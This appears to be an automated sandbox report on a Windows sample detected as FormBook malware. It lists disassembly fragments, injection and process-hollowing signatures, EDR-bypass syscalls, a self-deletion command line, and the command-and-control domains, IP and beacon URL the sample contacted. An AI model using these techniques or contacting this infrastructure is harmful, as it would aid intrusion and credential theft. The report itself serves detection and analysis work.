Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150C810 mov eax, dword ptr fs:[00000030h] 4_2_0150C810
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152483A mov eax, dword ptr fs:[00000030h] 4_2_0152483A
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152483A mov eax, dword ptr fs:[00000030h] 4_2_0152483A
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BA830 mov eax, dword ptr fs:[00000030h] 4_2_014BA830
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A2835 mov eax, dword ptr fs:[00000030h] 4_2_014A2835
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A2835 mov eax, dword ptr fs:[00000030h] 4_2_014A2835
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A2835 mov eax, dword ptr fs:[00000030h] 4_2_014A2835
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A2835 mov ecx, dword ptr fs:[00000030h] 4_2_014A2835
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A2835 mov eax, dword ptr fs:[00000030h] 4_2_014A2835
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A2835 mov eax, dword ptr fs:[00000030h] 4_2_014A2835
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AE8C0 mov eax, dword ptr fs:[00000030h] 4_2_014AE8C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015508C0 mov eax, dword ptr fs:[00000030h] 4_2_015508C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154A8E4 mov eax, dword ptr fs:[00000030h] 4_2_0154A8E4
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BC8F9 mov eax, dword ptr fs:[00000030h] 4_2_014BC8F9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BC8F9 mov eax, dword ptr fs:[00000030h] 4_2_014BC8F9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150C89D mov eax, dword ptr fs:[00000030h] 4_2_0150C89D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01480887 mov eax, dword ptr fs:[00000030h] 4_2_01480887
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152EB50 mov eax, dword ptr fs:[00000030h] 4_2_0152EB50
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01552B57 mov eax, dword ptr fs:[00000030h] 4_2_01552B57
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01552B57 mov eax, dword ptr fs:[00000030h] 4_2_01552B57
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01552B57 mov eax, dword ptr fs:[00000030h] 4_2_01552B57
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01552B57 mov eax, dword ptr fs:[00000030h] 4_2_01552B57
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01528B42 mov eax, dword ptr fs:[00000030h] 4_2_01528B42
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01516B40 mov eax, dword ptr fs:[00000030h] 4_2_01516B40
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01516B40 mov eax, dword ptr fs:[00000030h] 4_2_01516B40
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154AB40 mov eax, dword ptr fs:[00000030h] 4_2_0154AB40
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01478B50 mov eax, dword ptr fs:[00000030h] 4_2_01478B50
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01534B4B mov eax, dword ptr fs:[00000030h] 4_2_01534B4B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01534B4B mov eax, dword ptr fs:[00000030h] 4_2_01534B4B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147CB7E mov eax, dword ptr fs:[00000030h] 4_2_0147CB7E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FEB1D mov eax, dword ptr fs:[00000030h] 4_2_014FEB1D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FEB1D mov eax, dword ptr fs:[00000030h] 4_2_014FEB1D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FEB1D mov eax, dword ptr fs:[00000030h] 4_2_014FEB1D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FEB1D mov eax, dword ptr fs:[00000030h] 4_2_014FEB1D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FEB1D mov eax, dword ptr fs:[00000030h] 4_2_014FEB1D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FEB1D mov eax, dword ptr fs:[00000030h] 4_2_014FEB1D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FEB1D mov eax, dword ptr fs:[00000030h] 4_2_014FEB1D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FEB1D mov eax, dword ptr fs:[00000030h] 4_2_014FEB1D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FEB1D mov eax, dword ptr fs:[00000030h] 4_2_014FEB1D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01554B00 mov eax, dword ptr fs:[00000030h] 4_2_01554B00
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AEB20 mov eax, dword ptr fs:[00000030h] 4_2_014AEB20
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AEB20 mov eax, dword ptr fs:[00000030h] 4_2_014AEB20
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01548B28 mov eax, dword ptr fs:[00000030h] 4_2_01548B28
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01548B28 mov eax, dword ptr fs:[00000030h] 4_2_01548B28
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A0BCB mov eax, dword ptr fs:[00000030h] 4_2_014A0BCB
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A0BCB mov eax, dword ptr fs:[00000030h] 4_2_014A0BCB
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A0BCB mov eax, dword ptr fs:[00000030h] 4_2_014A0BCB
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152EBD0 mov eax, dword ptr fs:[00000030h] 4_2_0152EBD0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01480BCD mov eax, dword ptr fs:[00000030h] 4_2_01480BCD
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01480BCD mov eax, dword ptr fs:[00000030h] 4_2_01480BCD
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01480BCD mov eax, dword ptr fs:[00000030h] 4_2_01480BCD
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150CBF0 mov eax, dword ptr fs:[00000030h] 4_2_0150CBF0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AEBFC mov eax, dword ptr fs:[00000030h] 4_2_014AEBFC
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01488BF0 mov eax, dword ptr fs:[00000030h] 4_2_01488BF0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01488BF0 mov eax, dword ptr fs:[00000030h] 4_2_01488BF0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01488BF0 mov eax, dword ptr fs:[00000030h] 4_2_01488BF0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01534BB0 mov eax, dword ptr fs:[00000030h] 4_2_01534BB0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01534BB0 mov eax, dword ptr fs:[00000030h] 4_2_01534BB0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490BBE mov eax, dword ptr fs:[00000030h] 4_2_01490BBE
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490BBE mov eax, dword ptr fs:[00000030h] 4_2_01490BBE
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490A5B mov eax, dword ptr fs:[00000030h] 4_2_01490A5B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490A5B mov eax, dword ptr fs:[00000030h] 4_2_01490A5B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01486A50 mov eax, dword ptr fs:[00000030h] 4_2_01486A50
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01486A50 mov eax, dword ptr fs:[00000030h] 4_2_01486A50
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01486A50 mov eax, dword ptr fs:[00000030h] 4_2_01486A50
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01486A50 mov eax, dword ptr fs:[00000030h] 4_2_01486A50
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01486A50 mov eax, dword ptr fs:[00000030h] 4_2_01486A50
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01486A50 mov eax, dword ptr fs:[00000030h] 4_2_01486A50
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01486A50 mov eax, dword ptr fs:[00000030h] 4_2_01486A50
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BCA6F mov eax, dword ptr fs:[00000030h] 4_2_014BCA6F
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BCA6F mov eax, dword ptr fs:[00000030h] 4_2_014BCA6F
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BCA6F mov eax, dword ptr fs:[00000030h] 4_2_014BCA6F
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152EA60 mov eax, dword ptr fs:[00000030h] 4_2_0152EA60
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FCA72 mov eax, dword ptr fs:[00000030h] 4_2_014FCA72
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FCA72 mov eax, dword ptr fs:[00000030h] 4_2_014FCA72
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150CA11 mov eax, dword ptr fs:[00000030h] 4_2_0150CA11
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AEA2E mov eax, dword ptr fs:[00000030h] 4_2_014AEA2E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BCA24 mov eax, dword ptr fs:[00000030h] 4_2_014BCA24
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BCA38 mov eax, dword ptr fs:[00000030h] 4_2_014BCA38
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A4A35 mov eax, dword ptr fs:[00000030h] 4_2_014A4A35
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A4A35 mov eax, dword ptr fs:[00000030h] 4_2_014A4A35
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014D6ACC mov eax, dword ptr fs:[00000030h] 4_2_014D6ACC
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014D6ACC mov eax, dword ptr fs:[00000030h] 4_2_014D6ACC
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014D6ACC mov eax, dword ptr fs:[00000030h] 4_2_014D6ACC
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01480AD0 mov eax, dword ptr fs:[00000030h] 4_2_01480AD0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B4AD0 mov eax, dword ptr fs:[00000030h] 4_2_014B4AD0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B4AD0 mov eax, dword ptr fs:[00000030h] 4_2_014B4AD0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BAAEE mov eax, dword ptr fs:[00000030h] 4_2_014BAAEE
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BAAEE mov eax, dword ptr fs:[00000030h] 4_2_014BAAEE
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148EA80 mov eax, dword ptr fs:[00000030h] 4_2_0148EA80
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148EA80 mov eax, dword ptr fs:[00000030h] 4_2_0148EA80
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148EA80 mov eax, dword ptr fs:[00000030h] 4_2_0148EA80
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0016E8B5 GetProcessHeap,HeapAlloc,GetProcessHeap, 9_2_0016E8B5
Enables debug privileges
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0016D470 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_0016D470
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe NtQueueApcThread: Indirect: 0x18BA4F2 Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe NtClose: Indirect: 0x18BA56C
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory written: C:\Users\user\Desktop\yaM8XR1HfL.exe base: 170000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory written: C:\Users\user\Desktop\yaM8XR1HfL.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: NULL target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: NULL target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Thread register set: target process: 1028 Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Thread register set: target process: 1028 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 120000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process created: C:\Users\user\Desktop\yaM8XR1HfL.exe "C:\Users\user\Desktop\yaM8XR1HfL.exe" Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process created: C:\Users\user\Desktop\yaM8XR1HfL.exe "C:\Users\user\Desktop\yaM8XR1HfL.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\yaM8XR1HfL.exe" Jump to behavior
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B8D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2651644758.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094394902.0000000009B86000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000007.00000002.3294750047.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2497456423.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000007.00000002.3294750047.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2497456423.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.3299247758.0000000004B00000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000002.3294750047.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2497456423.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000002.3294750047.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2497456423.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000007.00000000.2496782788.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3292908189.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PProgman
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Queries volume information: C:\Users\user\Desktop\yaM8XR1HfL.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00158158 GetCurrentThreadId,GetCurrentThreadId,GetSystemTimeAsFileTime,GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentProcessId, 9_2_00158158
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_001A78E0 memset,memset,RtlGetVersion, 9_2_001A78E0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1465386 Sample: yaM8XR1HfL.exe Startdate: 01/07/2024 Architecture: WINDOWS Score: 100 32 www.osthirmaker.com 2->32 34 www.nftees.tech 2->34 38 Snort IDS alert for network traffic 2->38 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 10 other signatures 2->44 11 yaM8XR1HfL.exe 3 2->11         started        signatures3 process4 file5 30 C:\Users\user\AppData\...\yaM8XR1HfL.exe.log, ASCII 11->30 dropped 54 Tries to detect virtualization through RDTSC time measurements 11->54 56 Hides that the sample has been downloaded from the Internet (zone.identifier) 11->56 58 Injects a PE file into a foreign processes 11->58 60 Switches to a custom stack to bypass stack traces 11->60 15 yaM8XR1HfL.exe 11->15         started        18 yaM8XR1HfL.exe 11->18         started        signatures6 process7 signatures8 62 Modifies the context of a thread in another process (thread injection) 15->62 64 Maps a DLL or memory area into another process 15->64 66 Sample uses process hollowing technique 15->66 68 2 other signatures 15->68 20 explorer.exe 56 1 15->20 injected process9 dnsIp10 36 www.nftees.tech 217.160.0.1, 49718, 80 ONEANDONE-ASBrauerstrasse48DE Germany 20->36 23 WWAHost.exe 20->23         started        process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 23->46 48 Maps a DLL or memory area into another process 23->48 50 Tries to detect virtualization through RDTSC time measurements 23->50 52 Switches to a custom stack to bypass stack traces 23->52 26 cmd.exe 1 23->26         started        process13 process14 28 conhost.exe 26->28         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
217.160.0.1
 www.nftees.tech Germany
8560 ONEANDONE-ASBrauerstrasse48DE true

Contacted Domains

Name IP Active
www.nftees.tech 217.160.0.1 true
www.osthirmaker.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
www.liamcollinai.com/na10/ true
  • Avira URL Cloud: safe
 unknown
http://www.nftees.tech/na10/?y2=vxBAV4x3qjJKkl3AB8S3aH8FdY2weIJ3+CekvXUcdu0/pCH7SUv9XlMLgROraoBr2jfW&DV=lbC06h true
  • Avira URL Cloud: safe
 unknown